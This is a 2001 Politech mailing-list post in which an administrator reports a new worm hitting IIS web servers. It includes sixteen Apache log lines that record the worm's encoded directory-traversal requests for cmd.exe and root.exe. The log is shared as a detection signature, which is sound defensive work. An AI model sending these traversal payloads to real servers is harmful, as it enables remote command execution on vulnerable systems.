FC: Voracious, nasty new "Code Red" worm may be spreading quickly

[Declan McCullagh <declan () well com>]

[BTW I'm seeing similar attempts on Politech's website. Remember, folks, 
Code Red and its progeny only infect Windows systems. --Declan]

**********

Date: Tue, 18 Sep 2001 11:34:26 -0400
From: Rich Kulawiec <rsk () firemountain net>
To: Declan McCullagh <declan () well com>
Subject: It would appear that a 'Code Red' worm variant is in the wild

I'm seeing reports on nanog, inet-access, and isp-webhosting about this;
a fast look at my own web servers indicates that it's real, and that
the hits are coming at a ferocious rate.  (I would guesstimate at 10x
the rate at which Code Red hit.)  This seems to have started within
the last few hours; the first entry in my logs is from 0930 EDT today.

Here's a snippet from the Apache error log; this appears to constitute
the signature of this worm:

A.B.C.D - - [18/Sep/2001:11:30:11 -0400] "GET /scripts/root.exe?/c+dir 
HTTP/1.0" 404 270
A.B.C.D - - [18/Sep/2001:11:30:11 -0400] "GET /MSADC/root.exe?/c+dir 
HTTP/1.0" 404 268
A.B.C.D - - [18/Sep/2001:11:30:11 -0400] "GET 
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278
A.B.C.D - - [18/Sep/2001:11:30:11 -0400] "GET 
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278
A.B.C.D - - [18/Sep/2001:11:30:12 -0400] "GET 
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
A.B.C.D - - [18/Sep/2001:11:30:12 -0400] "GET 
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 309
A.B.C.D - - [18/Sep/2001:11:30:12 -0400] "GET 
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
HTTP/1.0" 404 309
A.B.C.D - - [18/Sep/2001:11:30:12 -0400] "GET 
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir 
HTTP
/1.0" 404 325
A.B.C.D - - [18/Sep/2001:11:30:13 -0400] "GET 
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
A.B.C.D - - [18/Sep/2001:11:30:16 -0400] "GET 
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
A.B.C.D - - [18/Sep/2001:11:30:16 -0400] "GET 
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
A.B.C.D - - [18/Sep/2001:11:30:16 -0400] "GET 
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
A.B.C.D - - [18/Sep/2001:11:30:17 -0400] "GET 
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275
A.B.C.D - - [18/Sep/2001:11:30:17 -0400] "GET 
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275
A.B.C.D - - [18/Sep/2001:11:30:17 -0400] "GET 
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
A.B.C.D - - [18/Sep/2001:11:30:18 -0400] "GET 
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292

So far, all hits have come in groups of 16 and appear to be directed at
exploiting a vulnerability that's presumably found on Windows systems
running IIS.  They also *seem* to be largely localized, that is, the
IP addresses of the incoming probes are related to the IP addresses of
the systems being targeted.

The sad part about this is that chunks of the 'net are already bottlenecked
under the load caused by the past weeks' events and the attempts to
disseminate information about them, including photos of missing persons, etc.

---Rsk
Rich Kulawiec
rsk () firemountain net 




-------------------------------------------------------------------------
POLITECH -- Declan McCullagh's politics and technology mailing list
You may redistribute this message freely if you include this notice.
Declan McCullagh's photographs are at http://www.mccullagh.org/
To subscribe to Politech: http://www.politechbot.com/info/subscribe.html
This message is archived at http://www.politechbot.com/
-------------------------------------------------------------------------